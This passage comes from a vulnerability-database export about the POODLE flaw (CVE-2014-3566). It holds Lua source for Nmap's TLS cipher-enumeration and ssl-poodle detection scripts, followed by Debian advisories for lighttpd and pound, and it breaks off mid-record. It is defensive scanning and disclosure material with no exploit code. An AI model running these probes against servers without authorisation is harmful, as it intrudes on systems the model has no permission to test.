max_chunks or CHUNK_SIZE\nend\n\n-- Break the cipher list into chunks of CHUNK_SIZE (for servers that can't\n-- handle many client ciphers at once), and then call find_ciphers_group on\n-- each chunk.\nlocal function find_ciphers(host, port, protocol)\n\n local ciphers = in_chunks(sorted_keys(tls.CIPHERS), get_chunk_size(host, protocol))\n\n local results = {}\n local scores = {warnings={}}\n -- Try every cipher.\n for _, group in ipairs(ciphers) do\n local chunk, protocol_worked = find_ciphers_group(host, port, protocol, group, scores)\n if protocol_worked == nil then return nil end\n for _, name in ipairs(chunk) do\n table.insert(results, name)\n end\n end\n if not next(results) then return nil end\n\n return results, scores\nend\n\nlocal function find_compressors(host, port, protocol, good_ciphers)\n local compressors = sorted_keys(tls.COMPRESSORS)\n local t = {\n [\"protocol\"] = protocol,\n [\"ciphers\"] = good_ciphers,\n [\"extensions\"] = base_extensions(host),\n }\n\n local results = {}\n\n -- Try every compressor.\n local protocol_worked = false\n while (next(compressors)) do\n -- Create structure.\n t[\"compressors\"] = compressors\n\n -- Try connecting with compressor.\n local records = try_params(host, port, t)\n local handshake = records.handshake\n\n if handshake == nil then\n local alert = records.alert\n if alert then\n ctx_log(2, protocol, \"Got alert: %s\", alert.body[1].description)\n if alert[\"protocol\"] ~= protocol then\n ctx_log(1, protocol, \"Protocol rejected.\")\n protocol_worked = nil\n break\n elseif get_body(alert, \"description\", \"handshake_failure\") then\n protocol_worked = true\n ctx_log(2, protocol, \"%d compressors rejected.\", #compressors)\n -- Should never get here, because NULL should be good enough.\n -- The server may just not be able to handle multiple compressors.\n if #compressors > 1 then -- Make extra-sure it's not crazily rejecting the NULL compressor\n compressors[1] = \"NULL\"\n for i = 2, #compressors, 1 do\n compressors[i] = nil\n end\n -- try again.\n else\n break\n end\n end\n elseif protocol_worked then\n ctx_log(2, protocol, \"%d compressors rejected. (No handshake)\", #compressors)\n else\n ctx_log(1, protocol, \"%d compressors and/or protocol rejected. (No handshake)\", #compressors)\n end\n break\n else\n local server_hello = get_body(handshake, \"type\", \"server_hello\")\n if not server_hello then\n ctx_log(2, protocol, \"Unexpected record received.\")\n break\n end\n if server_hello.protocol ~= protocol then\n ctx_log(1, protocol, \"Protocol rejected.\")\n protocol_worked = (protocol_worked == nil) and nil or false\n break\n else\n protocol_worked = true\n local name = server_hello.compressor\n ctx_log(2, protocol, \"Compressor %s chosen.\", name)\n remove(compressors, name)\n\n -- Add compressor to the list of accepted compressors.\n table.insert(results, name)\n if name == \"NULL\" then\n break -- NULL is always last choice, and must be included\n end\n end\n end\n end\n\n return results\nend\n\n-- Offer two ciphers and return the one chosen by the server. Returns nil and\n-- an error message in case of a server error.\nlocal function compare_ciphers(host, port, protocol, cipher_a, cipher_b)\n local t = {\n [\"protocol\"] = protocol,\n [\"ciphers\"] = {cipher_a, cipher_b},\n [\"extensions\"] = base_extensions(host),\n }\n local records = try_params(host, port, t)\n local server_hello = records.handshake and get_body(records.handshake, \"type\", \"server_hello\")\n if server_hello then\n ctx_log(2, protocol, \"compare %s %s -> %s\", cipher_a, cipher_b, server_hello.cipher)\n return server_hello.cipher\n else\n ctx_log(2, protocol, \"compare %s %s -> error\", cipher_a, cipher_b)\n return nil, string.format(\"Error when comparing %s and %s\", cipher_a, cipher_b)\n end\nend\n\n-- Try to find whether the server prefers its own ciphersuite order or that of\n-- the client.\n--\n-- The return value is (preference, err). preference is a string:\n-- \"server\": the server prefers its own order. In this case ciphers is non-nil.\n-- \"client\": the server follows the client preference. ciphers is nil.\n-- \"indeterminate\": returned when there are only 0 or 1 ciphers. ciphers is nil.\n-- nil: an error occurred during the test. err is non-nil.\n-- err is an error message string that is non-nil when preference is nil or\n-- indeterminate.\n--\n-- The algorithm tries offering two ciphersuites in two different orders. If\n-- the server makes a different choice each time, \"client\" preference is\n-- assumed. Otherwise, \"server\" preference is assumed.\nlocal function find_cipher_preference(host, port, protocol, ciphers)\n -- Too few ciphers to make a decision?\n if #ciphers < 2 then\n return \"indeterminate\", \"Too few ciphers supported\"\n end\n\n -- Do a comparison in both directions to see if server ordering is consistent.\n local cipher_a, cipher_b = ciphers[1], ciphers[2]\n ctx_log(1, protocol, \"Comparing %s to %s\", cipher_a, cipher_b)\n local winner_forwards, err = compare_ciphers(host, port, protocol, cipher_a, cipher_b)\n if not winner_forwards then\n return nil, err\n end\n local winner_backward, err = compare_ciphers(host, port, protocol, cipher_b, cipher_a)\n if not winner_backward then\n return nil, err\n end\n if winner_forwards ~= winner_backward then\n return \"client\", nil\n end\n return \"server\", nil\nend\n\n-- Sort ciphers according to server preference with a modified merge sort\nlocal function sort_ciphers(host, port, protocol, ciphers)\n local chunks = {}\n for _, group in ipairs(in_chunks(ciphers, get_chunk_size(host, protocol))) do\n local size = #group\n local chunk = find_ciphers_group(host, port, protocol, group)\n if not chunk then\n return nil, \"Network error\"\n end\n if #chunk ~= size then\n ctx_log(1, protocol, \"warning: %d ciphers offered but only %d accepted\", size, #chunk)\n end\n table.insert(chunks, chunk)\n end\n\n -- The comparison operator for the merge is a 2-cipher ClientHello.\n local function cmp(cipher_a, cipher_b)\n return compare_ciphers(host, port, protocol, cipher_a, cipher_b)\n end\n local sorted, err = merge_recursive(chunks, cmp)\n if not sorted then\n return nil, err\n end\n return sorted\nend\n\nlocal function try_protocol(host, port, protocol, upresults)\n local condvar = nmap.condvar(upresults)\n\n local results = stdnse.output_table()\n\n -- Find all valid ciphers.\n local ciphers, scores = find_ciphers(host, port, protocol)\n if ciphers == nil then\n condvar \"signal\"\n return nil\n end\n\n if #ciphers == 0 then\n results = {ciphers={},compressors={}}\n setmetatable(results,{\n __tostring=function(t) return \"No supported ciphers found\" end\n })\n upresults[protocol] = results\n condvar \"signal\"\n return nil\n end\n -- Find all valid compression methods.\n local compressors\n -- Reduce chunk size by 1 to allow extra room for the extra compressors (2 bytes)\n for _, c in ipairs(in_chunks(ciphers, get_chunk_size(host, protocol) - 1)) do\n compressors = find_compressors(host, port, protocol, c)\n -- I observed a weird interaction between ECDSA ciphers and DEFLATE compression.\n -- Some servers would reject the handshake if no non-ECDSA ciphers were available.\n -- Sending 64 ciphers at a time should be sufficient, but we'll try them all if necessary.\n if compressors and #compressors ~= 0 then\n break\n end\n end\n\n -- Note the server's cipher preference algorithm.\n local cipher_pref, cipher_pref_err = find_cipher_preference(host, port, protocol, ciphers)\n\n -- Order ciphers according to server preference, if possible\n if cipher_pref == \"server\" then\n local sorted, err = sort_ciphers(host, port, protocol, ciphers)\n if sorted then\n ciphers = sorted\n else\n -- Can't sort, fall back to alphabetical order\n table.sort(ciphers)\n cipher_pref_err = err\n end\n else\n -- fall back to alphabetical order\n table.sort(ciphers)\n end\n\n -- Add rankings to ciphers\n for i, name in ipairs(ciphers) do\n local outcipher = {name=name, kex_info=scores[name].extra, strength=scores[name].letter_grade}\n setmetatable(outcipher,{\n __tostring=function(t)\n if t.kex_info then\n return string.format(\"%s (%s) - %s\", t.name, t.kex_info, t.strength)\n else\n return string.format(\"%s - %s\", t.name, t.strength)\n end\n end\n })\n ciphers[i]=outcipher\n end\n\n results[\"ciphers\"] = ciphers\n\n -- Format the compressor table.\n if compressors then\n table.sort(compressors)\n end\n results[\"compressors\"] = compressors\n\n results[\"cipher preference\"] = cipher_pref\n results[\"cipher preference error\"] = cipher_pref_err\n if next(scores.warnings) then\n results[\"warnings\"] = sorted_keys(scores.warnings)\n end\n\n upresults[protocol] = results\n condvar \"signal\"\n return nil\nend\n\nportrule = function (host, port)\n return shortport.ssl(host, port) or sslcert.getPrepareTLSWithoutReconnect(port)\nend\n\n--- Return a table that yields elements sorted by key when iterated over with pairs()\n-- Should probably put this in a formatting library later.\n-- Depends on keys() function defined above.\n--@param t The table whose data should be used\n--@return out A table that can be passed to pairs() to get sorted results\nfunction sorted_by_key(t)\n local out = {}\n setmetatable(out, {\n __pairs = function(_)\n local order = sorted_keys(t)\n return coroutine.wrap(function()\n for i,k in ipairs(order) do\n coroutine.yield(k, t[k])\n end\n end)\n end\n })\n return out\nend\n\naction = function(host, port)\n\n if not have_ssl then\n stdnse.verbose(\"OpenSSL not available; some cipher scores will be marked as unknown.\")\n end\n\n local results = {}\n\n local condvar = nmap.condvar(results)\n local threads = {}\n\n for name, _ in pairs(tls.PROTOCOLS) do\n stdnse.debug1(\"Trying protocol %s.\", name)\n local co = stdnse.new_thread(try_protocol, host, port, name, results)\n threads[co] = true\n end\n\n repeat\n for thread in pairs(threads) do\n if coroutine.status(thread) == \"dead\" then threads[thread] = nil end\n end\n if ( next(threads) ) then\n condvar \"wait\"\n end\n until next(threads) == nil\n\n if not next(results) then\n return nil\n end\n\n local least = \"A\"\n for p, r in pairs(results) do\n for i, c in ipairs(r.ciphers) do\n -- counter-intuitive: \"A\" < \"B\", so really looking for max\n least = least < c.strength and c.strength or least\n end\n end\n results[\"least strength\"] = least\n\n return sorted_by_key(results)\nend\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "nmap": {"scriptType": "portrule", "categories": ["discovery", "intrusive"]}}, {"lastseen": "2018-06-28T16:22:04", "references": [], "description": "Checks whether SSLv3 CBC ciphers are allowed (POODLE) \n\nRun with -sV to use Nmap's service scan to detect SSL/TLS on non-standard ports. Otherwise, ssl-poodle will only run on ports that are commonly used for SSL. \n\nPOODLE is CVE-2014-3566. All implementations of SSLv3 that accept CBC ciphersuites are vulnerable. For speed of detection, this script will stop after the first CBC ciphersuite is discovered. If you want to enumerate all CBC ciphersuites, you can use Nmap's own ssl-enum-ciphers to do a full audit of your TLS ciphersuites.\n\n## Script Arguments \n\n#### tls.servername \n\nSee the documentation for the tls library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### mssql.domain, mssql.instance-all, mssql.instance-name, mssql.instance-port, mssql.password, mssql.protocol, mssql.scanned-ports-only, mssql.timeout, mssql.username \n\nSee the documentation for the mssql library. \n\n#### smtp.domain \n\nSee the documentation for the smtp library. \n\n#### randomseed, smbbasic, smbport, smbsign \n\nSee the documentation for the smb library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap -sV --version-light --script ssl-poodle -p 443 <host>\n \n\n## Script Output \n \n \n PORT STATE SERVICE REASON\n 443/tcp open https syn-ack\n | ssl-poodle:\n | VULNERABLE:\n | SSL POODLE information leak\n | State: VULNERABLE\n | IDs: CVE:CVE-2014-3566 OSVDB:113251\n | The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and\n | other products, uses nondeterministic CBC padding, which makes it easier\n | for man-in-the-middle attackers to obtain cleartext data via a\n | padding-oracle attack, aka the \"POODLE\" issue.\n | Disclosure date: 2014-10-14\n | Check results:\n | TLS_RSA_WITH_3DES_EDE_CBC_SHA\n | References:\n | https://www.imperialviolet.org/2014/10/14/poodle.html\n | http://osvdb.org/113251\n | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n |_ https://www.openssl.org/~bodo/ssl-poodle.pdf\n \n\n## Requires \n\n * nmap\n * shortport\n * sslcert\n * stdnse\n * string\n * table\n * tls\n * listop\n * vulns\n\n* * *\n", "edition": 8, "reporter": "Daniel Miller", "published": "2014-10-21T14:08:34", "title": "ssl-poodle NSE Script", "type": "nmap", "enchantments": {"score": {"vector": "NONE", "value": 7.2}}, "bulletinFamily": "scanner", "cvelist": ["CVE-2014-3566"], "modified": "2018-06-28T03:43:27", "id": "NMAP:SSL-POODLE.NSE", "href": "https://nmap.org/nsedoc/scripts/ssl-poodle.html", "sourceData": "local nmap = require \"nmap\"\nlocal shortport = require \"shortport\"\nlocal sslcert = require \"sslcert\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal table = require \"table\"\nlocal tls = require \"tls\"\nlocal listop = require \"listop\"\nlocal vulns = require \"vulns\"\n\ndescription = [[\nChecks whether SSLv3 CBC ciphers are allowed (POODLE)\n\nRun with -sV to use Nmap's service scan to detect SSL/TLS on non-standard\nports. Otherwise, ssl-poodle will only run on ports that are commonly used for\nSSL.\n\nPOODLE is CVE-2014-3566. All implementations of SSLv3 that accept CBC\nciphersuites are vulnerable. For speed of detection, this script will stop\nafter the first CBC ciphersuite is discovered. If you want to enumerate all CBC\nciphersuites, you can use Nmap's own ssl-enum-ciphers to do a full audit of\nyour TLS ciphersuites.\n]]\n\n---\n-- @usage\n-- nmap -sV --version-light --script ssl-poodle -p 443 <host>\n--\n-- @output\n-- PORT STATE SERVICE REASON\n-- 443/tcp open https syn-ack\n-- | ssl-poodle:\n-- | VULNERABLE:\n-- | SSL POODLE information leak\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2014-3566 OSVDB:113251\n-- | The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and\n-- | other products, uses nondeterministic CBC padding, which makes it easier\n-- | for man-in-the-middle attackers to obtain cleartext data via a\n-- | padding-oracle attack, aka the \"POODLE\" issue.\n-- | Disclosure date: 2014-10-14\n-- | Check results:\n-- | TLS_RSA_WITH_3DES_EDE_CBC_SHA\n-- | References:\n-- | https://www.imperialviolet.org/2014/10/14/poodle.html\n-- | http://osvdb.org/113251\n-- | http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3566\n-- |_ https://www.openssl.org/~bodo/ssl-poodle.pdf\n--\n\nauthor = \"Daniel Miller\"\n\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\n\ncategories = {\"vuln\", \"safe\"}\n\ndependencies = {\"ssl-enum-ciphers\", \"https-redirect\"}\n\n-- Test this many ciphersuites at a time.\n-- http://seclists.org/nmap-dev/2012/q3/156\n-- http://seclists.org/nmap-dev/2010/q1/859\nlocal CHUNK_SIZE = 64\n\nlocal function keys(t)\n local ret = {}\n local k, v = next(t)\n while k do\n ret[#ret+1] = k\n k, v = next(t, k)\n end\n return ret\nend\n\n-- Add additional context (protocol) to debug output\nlocal function ctx_log(level, protocol, fmt, ...)\n return stdnse.print_debug(level, \"(%s) \" .. fmt, protocol, ...)\nend\n\nlocal function try_params(host, port, t)\n local timeout = ((host.times and host.times.timeout) or 5) * 1000 + 5000\n\n -- Create socket.\n local status, sock, err\n local specialized = sslcert.getPrepareTLSWithoutReconnect(port)\n if specialized then\n status, sock = specialized(host, port)\n if not status then\n ctx_log(1, t.protocol, \"Can't connect: %s\", sock)\n return nil\n end\n else\n sock = nmap.new_socket()\n sock:set_timeout(timeout)\n status, err = sock:connect(host, port)\n if not status then\n ctx_log(1, t.protocol, \"Can't connect: %s\", err)\n sock:close()\n return nil\n end\n end\n\n sock:set_timeout(timeout)\n\n -- Send request.\n local req = tls.client_hello(t)\n status, err = sock:send(req)\n if not status then\n ctx_log(1, t.protocol, \"Can't send: %s\", err)\n sock:close()\n return nil\n end\n\n -- Read response.\n local buffer = \"\"\n local i = 1\n while true do\n status, buffer, err = tls.record_buffer(sock, buffer, i)\n if not status then\n ctx_log(1, t.protocol, \"Couldn't read a TLS record: %s\", err)\n return nil\n end\n -- Parse response.\n local record\n i, record = tls.record_read(buffer, i)\n if record and record.type == \"alert\" and record.body[1].level == \"warning\" then\n ctx_log(1, t.protocol, \"Ignoring warning: %s\", record.body[1].description)\n -- Try again.\n elseif record then\n sock:close()\n return record\n end\n end\nend\n\nlocal function sorted_keys(t)\n local ret = {}\n for k, _ in pairs(t) do\n ret[#ret+1] = k\n end\n table.sort(ret)\n return ret\nend\n\nlocal function in_chunks(t, size)\n local ret = {}\n for i = 1, #t, size do\n local chunk = {}\n for j = i, i + size - 1 do\n chunk[#chunk+1] = t[j]\n end\n ret[#ret+1] = chunk\n end\n return ret\nend\n\nlocal function remove(t, e)\n for i, v in ipairs(t) do\n if v == e then\n table.remove(t, i)\n return i\n end\n end\n return nil\nend\n\n-- https://bugzilla.mozilla.org/show_bug.cgi?id=946147\nlocal function remove_high_byte_ciphers(t)\n local output = {}\n for i, v in ipairs(t) do\n if tls.CIPHERS[v] <= 255 then\n output[#output+1] = v\n end\n end\n return output\nend\n\nlocal function base_extensions(host)\n local tlsname = tls.servername(host)\n return {\n -- Claim to support common elliptic curves\n [\"elliptic_curves\"] = tls.EXTENSION_HELPERS[\"elliptic_curves\"](tls.DEFAULT_ELLIPTIC_CURVES),\n -- Enable SNI if a server name is available\n [\"server_name\"] = tlsname and tls.EXTENSION_HELPERS[\"server_name\"](tlsname),\n }\nend\n\n-- Recursively copy a table.\n-- Only recurs when a value is a table, other values are copied by assignment.\nlocal function tcopy (t)\n local tc = {};\n for k,v in pairs(t) do\n if type(v) == \"table\" then\n tc[k] = tcopy(v);\n else\n tc[k] = v;\n end\n end\n return tc;\nend\n\n-- Find which ciphers out of group are supported by the server.\nlocal function find_ciphers_group(host, port, protocol, group)\n local name, protocol_worked, record, results\n results = {}\n local t = {\n [\"protocol\"] = protocol,\n [\"extensions\"] = base_extensions(host),\n }\n\n -- This is a hacky sort of tristate variable. There are three conditions:\n -- 1. false = either ciphers or protocol is bad. Keep trying with new ciphers\n -- 2. nil = The protocol is bad. Abandon thread.\n -- 3. true = Protocol works, at least some cipher must be supported.\n protocol_worked = false\n while (next(group)) do\n t[\"ciphers\"] = group\n\n record = try_params(host, port, t)\n\n if record == nil then\n if protocol_worked then\n ctx_log(2, protocol, \"%d ciphers rejected. (No handshake)\", #group)\n else\n ctx_log(1, protocol, \"%d ciphers and/or protocol rejected. (No handshake)\", #group)\n end\n break\n elseif record[\"protocol\"] ~= protocol or record[\"body\"][1][\"protocol\"] and record.body[1].protocol ~= protocol then\n ctx_log(1, protocol, \"Protocol rejected.\")\n protocol_worked = nil\n break\n elseif record[\"type\"] == \"alert\" and record[\"body\"][1][\"description\"] == \"handshake_failure\" then\n protocol_worked = true\n ctx_log(2, protocol, \"%d ciphers rejected.\", #group)\n break\n elseif record[\"type\"] ~= \"handshake\" or record[\"body\"][1][\"type\"] ~= \"server_hello\" then\n ctx_log(2, protocol, \"Unexpected record received.\")\n break\n else\n protocol_worked = true\n name = record[\"body\"][1][\"cipher\"]\n ctx_log(1, protocol, \"Cipher %s chosen.\", name)\n if not remove(group, name) then\n ctx_log(1, protocol, \"chose cipher %s that was not offered.\", name)\n ctx_log(1, protocol, \"removing high-byte ciphers and trying again.\")\n local size_before = #group\n group = remove_high_byte_ciphers(group)\n ctx_log(1, protocol, \"removed %d high-byte ciphers.\", size_before - #group)\n if #group == size_before then\n -- No changes... Server just doesn't like our offered ciphers.\n break\n end\n else\n -- Add cipher to the list of accepted ciphers.\n table.insert(results, name)\n -- POODLE check doesn't care about the rest of the ciphers\n break\n end\n end\n end\n return results, protocol_worked\nend\n\n-- POODLE only affects CBC ciphers\nlocal cbc_ciphers = listop.filter(\n function(x) return string.find(x, \"_CBC_\",1,true) end,\n sorted_keys(tls.CIPHERS)\n )\n-- move these to the top, more likely to be supported\nfor _, c in ipairs({\n \"TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA\", --mandatory for TLSv1.0\n \"TLS_RSA_WITH_3DES_EDE_CBC_SHA\", -- mandatory for TLSv1.1\n \"TLS_RSA_WITH_AES_128_CBC_SHA\", -- mandatory fro TLSv1.2\n }) do\n remove(cbc_ciphers, c)\n table.insert(cbc_ciphers, 1, c)\nend\n\n-- Break the cipher list into chunks of CHUNK_SIZE (for servers that can't\n-- handle many client ciphers at once), and then call find_ciphers_group on\n-- each chunk.\nlocal function find_ciphers(host, port, protocol)\n local name, protocol_worked, results, chunk\n local ciphers = in_chunks(cbc_ciphers, CHUNK_SIZE)\n\n results = {}\n\n -- Try every cipher.\n for _, group in ipairs(ciphers) do\n chunk, protocol_worked = find_ciphers_group(host, port, protocol, group)\n if protocol_worked == nil then return nil end\n for _, name in ipairs(chunk) do\n table.insert(results, name)\n end\n -- Another POODLE shortcut\n if protocol_worked and next(results) then return results end\n end\n return results\nend\n\n-- check if draft-ietf-tls-downgrade-scsv-00 is implemented as a mitigation\nlocal function check_fallback_scsv(host, port, protocol, ciphers)\n local results = {}\n local t = {\n [\"protocol\"] = protocol,\n [\"extensions\"] = base_extensions(host),\n }\n\n t[\"ciphers\"] = tcopy(ciphers)\n t.ciphers[#t.ciphers+1] = \"TLS_FALLBACK_SCSV\"\n\n -- TODO: remove this check after the next release.\n -- Users are using this script without the necessary tls.lua changes\n if not tls.TLS_ALERT_REGISTRY[\"inappropriate_fallback\"] then\n -- This could get dangerous if mixed with ssl-enum-ciphers\n -- so we make this script dependent on ssl-enum-ciphers and hope for the best.\n tls.CIPHERS[\"TLS_FALLBACK_SCSV\"] = 0x5600\n tls.TLS_ALERT_REGISTRY[\"inappropriate_fallback\"] = 86\n end\n\n local record = try_params(host, port, t)\n\n -- cleanup (also remove after next release)\n tls.CIPHERS[\"TLS_FALLBACK_SCSV\"] = nil\n\n if record and record[\"type\"] == \"alert\" and record[\"body\"][1][\"description\"] == \"inappropriate_fallback\" then\n ctx_log(2, protocol, \"TLS_FALLBACK_SCSV rejected properly.\")\n return true\n end\n return false\nend\n\nportrule = function (host, port)\n return shortport.ssl(host, port) or sslcert.getPrepareTLSWithoutReconnect(port)\nend\n\naction = function(host, port)\n local vuln_table = {\n title = \"SSL POODLE information leak\",\n description = [[\n The SSL protocol 3.0, as used in OpenSSL through 1.0.1i and other\n products, uses nondeterministic CBC padding, which makes it easier\n for man-in-the-middle attackers to obtain cleartext data via a\n padding-oracle attack, aka the \"POODLE\" issue.]],\n state = vulns.STATE.NOT_VULN,\n IDS = {\n CVE = 'CVE-2014-3566',\n OSVDB = '113251'\n },\n SCORES = {\n CVSSv2 = '4.3'\n },\n dates = {\n disclosure = {\n year = 2014, month = 10, day = 14\n }\n },\n references = {\n \"https://www.openssl.org/~bodo/ssl-poodle.pdf\",\n \"https://www.imperialviolet.org/2014/10/14/poodle.html\"\n }\n }\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n\n local ciphers = find_ciphers(host, port, 'SSLv3')\n if ciphers == nil then\n vuln_table.check_results = { \"SSLv3 not supported\" }\n elseif #ciphers == 0 then\n vuln_table.check_results = { \"No CBC ciphersuites found\" }\n else\n vuln_table.check_results = ciphers\n if check_fallback_scsv(host, port, 'SSLv3', ciphers) then\n table.insert(vuln_table.check_results, \"TLS_FALLBACK_SCSV properly implemented\")\n vuln_table.state = vulns.STATE.LIKELY_VULN\n else\n vuln_table.state = vulns.STATE.VULN\n end\n end\n return report:make_output(vuln_table)\nend\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "nmap": {"scriptType": "portrule", "categories": ["safe", "vuln"]}}], "debian": [{"lastseen": "2016-09-02T18:25:30", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "1.4.31-4+deb7u4", "arch": "all", "packageFilename": "lighttpd-mod-cml_1.4.31-4+deb7u4_all.deb", "packageName": "lighttpd-mod-cml", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "1.4.31-4+deb7u4", "arch": "all", "packageFilename": "lighttpd-doc_1.4.31-4+deb7u4_all.deb", "packageName": "lighttpd-doc", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "1.4.31-4+deb7u4", "arch": "all", "packageFilename": "lighttpd-mod-mysql-vhost_1.4.31-4+deb7u4_all.deb", "packageName": "lighttpd-mod-mysql-vhost", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "1.4.31-4+deb7u4", "arch": "all", "packageFilename": "lighttpd-mod-trigger-b4-dl_1.4.31-4+deb7u4_all.deb", "packageName": "lighttpd-mod-trigger-b4-dl", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "1.4.31-4+deb7u4", "arch": "all", "packageFilename": "lighttpd-mod-webdav_1.4.31-4+deb7u4_all.deb", "packageName": "lighttpd-mod-webdav", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "1.4.31-4+deb7u4", "arch": "all", "packageFilename": "lighttpd-mod-magnet_1.4.31-4+deb7u4_all.deb", "packageName": "lighttpd-mod-magnet", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "1.4.31-4+deb7u4", "arch": "all", "packageFilename": "lighttpd_1.4.31-4+deb7u4_all.deb", "packageName": "lighttpd", "operator": "lt"}], "description": "lighttpd, a small webserver, is vulnerable to the POODLE attack via the use of SSLv3. This protocol is now disabled by default.\n\nFor the oldstable distribution (wheezy), this problem has been fixed in version 1.4.31-4+deb7u4.\n\nWe recommend that you upgrade your lighttpd packages.", "edition": 1, "reporter": "Debian", "published": "2016-02-23T00:00:00", "title": "lighttpd -- security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2016-02-23T00:00:00", "id": "DSA-3489", "href": "http://www.debian.org/security/dsa-3489", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-02T12:56:36", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "6", "packageVersion": "1.4.28-2+squeeze1.7", "arch": "all", "packageFilename": "lighttpd_1.4.28-2+squeeze1.7_all.deb", "packageName": "lighttpd", "operator": "lt"}], "description": "This update allows to disable SSLv3 in lighttpd in order to protect against the POODLE attack. SSLv3 is now disabled by default and can be reenabled (if needed) using the ssl.use-sslv3 option.", "edition": 1, "reporter": "Debian", "published": "2015-07-25T00:00:00", "title": "lighttpd -- LTS security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "type": "debian", "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566"], "modified": "2015-07-25T00:00:00", "id": "DLA-282", "href": "http://www.debian.org/security/2015/dla-282", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2016-09-02T18:33:10", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "7", "packageVersion": "2.6-2+deb7u1", "packageFilename": "pound_2.6-2+deb7u1_all.deb", "arch": "all", "packageName": "pound", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "8", "packageVersion": "2.6-6+deb8u1", "packageFilename": "pound_2.6-6+deb8u1_all.deb", "arch": "all", "packageName": "pound", "operator": "lt"}], "edition": 1, "description": "Pound, a HTTP reverse proxy and load balancer, had several issues related to vulnerabilities in the Secure Sockets Layer (SSL) protocol.\n\nFor Debian 7 (wheezy) this update adds a missing part to make it actually possible to disable client-initiated renegotiation and disables it by default ([CVE-2009-3555](<https://security-tracker.debian.org/tracker/CVE-2009-3555>)). TLS compression is disabled ([CVE-2012-4929](<https://security-tracker.debian.org/tracker/CVE-2012-4929>)), although this is normally already disabled by the OpenSSL system library. Finally it adds the ability to disable the SSLv3 protocol ([CVE-2014-3566](<https://security-tracker.debian.org/tracker/CVE-2014-3566>)) entirely via the new DisableSSLv3 configuration directive, although it will not disabled by default in this update. Additionally a non-security sensitive issue in redirect encoding is addressed.\n\nFor Debian 8 (jessie) these issues have been fixed prior to the release, with the exception of client-initiated renegotiation ([CVE-2009-3555](<https://security-tracker.debian.org/tracker/CVE-2009-3555>)). This update addresses that issue for jessie.\n\nFor the oldstable distribution (wheezy), these problems have been fixed in version 2.6-2+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in version 2.6-6+deb8u1.\n\nFor the unstable distribution (sid), these problems have been fixed in version 2.6-6.1.\n\nWe recommend that you upgrade your pound packages.", "reporter": "Debian", "published": "2015-05-07T00:00:00", "type": "debian", "title": "pound -- security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2014-3566", "CVE-2012-4929", "CVE-2009-3555"], "modified": "2015-05-07T00:00:00", "id": "DSA-3253", "href": "http://www.debian.org/security/dsa-3253", "cvss": {"score": 5.8, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2016-09-02T12:56:43", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "6", "packageVersion": "2.6-1+deb6u1", "arch": "all", "packageFilename": "pound_2.6-1+deb6u1_all.deb", "packageName": "pound", "operator": "lt"}], "description": "This update fixes certain known vulnerabilities in pound in squeeze-lts by backporting the version in wheezy.\n\n * [CVE-2009-3555](<https://security-tracker.debian.org/tracker/CVE-2009-3555>)\n\nThe TLS protocol, and the SSL protocol 3.0 and possibly earlier, as used in Microsoft Internet Information Services (IIS) 7.0, mod_ssl in the Apache HTTP Server 2.2.14 and earlier, OpenSSL before 0.9.8l, GnuTLS 2.8.5 and earlier, Mozilla Network Security Services (NSS) 3.12.4 and earlier, multiple Cisco products, and other products, does not properly associate renegotiation handshakes with an existing connection, which allows man-in-the-middle attackers to insert data into HTTPS sessions, and possibly other types of sessions protected by TLS or SSL, by sending an unauthenticated request that is processed retroactively by a server in a post-renegotiation context, related to a plaintext injection attack, aka the Project Mogul issue.\n\n * [CVE-2011-3389](<https://security-tracker.debian.org/tracker/CVE-2011-3389>)\n\nThe SSL protocol, as used in certain configurations in Microsoft Windows and Microsoft Internet Explorer, Mozilla Firefox, Google Chrome, Opera, and other products, encrypts data by using CBC mode with chained initialization vectors, which allows man-in-the-middle attackers to obtain plaintext HTTP headers via a blockwise chosen-boundary attack (BCBA) on an HTTPS session, in conjunction with JavaScript code that uses (1) the HTML5 WebSocket API, 